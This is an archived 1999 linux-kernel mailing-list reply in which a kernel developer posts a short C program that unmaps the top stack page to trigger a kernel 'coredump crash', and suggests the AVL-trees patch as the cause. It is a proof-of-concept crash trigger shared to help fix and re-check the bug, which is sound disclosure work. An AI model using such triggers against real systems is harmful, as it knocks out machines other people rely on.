[LWN Logo]

Date:	Wed, 27 Jan 1999 14:18:19 +0100 (CET)
From:	MOLNAR Ingo <mingo@chiara.csoma.elte.hu>
To:	linux-kernel@vger.rutgers.edu, linux-smp@vger.rutgers.edu
Subject: Re: [patch] 'coredump crash' fixed


theres a much simpler exploit for those interested:

#include <unistd.h>
#include <sys/mman.h>

void main (void)
{
        munmap((void*)0xbffff000, 4096);
}

(the ld-so exploit had this unmap hidden implicitly in an mmap(), not
necessarily obvious at first sight.)

-- Ingo 'now where is that bag construction kit' Molnar

ps. there might be similar bugs nearby, i have not yet checked. I guess
    this whole thing is a side-effect of the AVL-trees patch, it might be
    wise to recheck that patch.


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/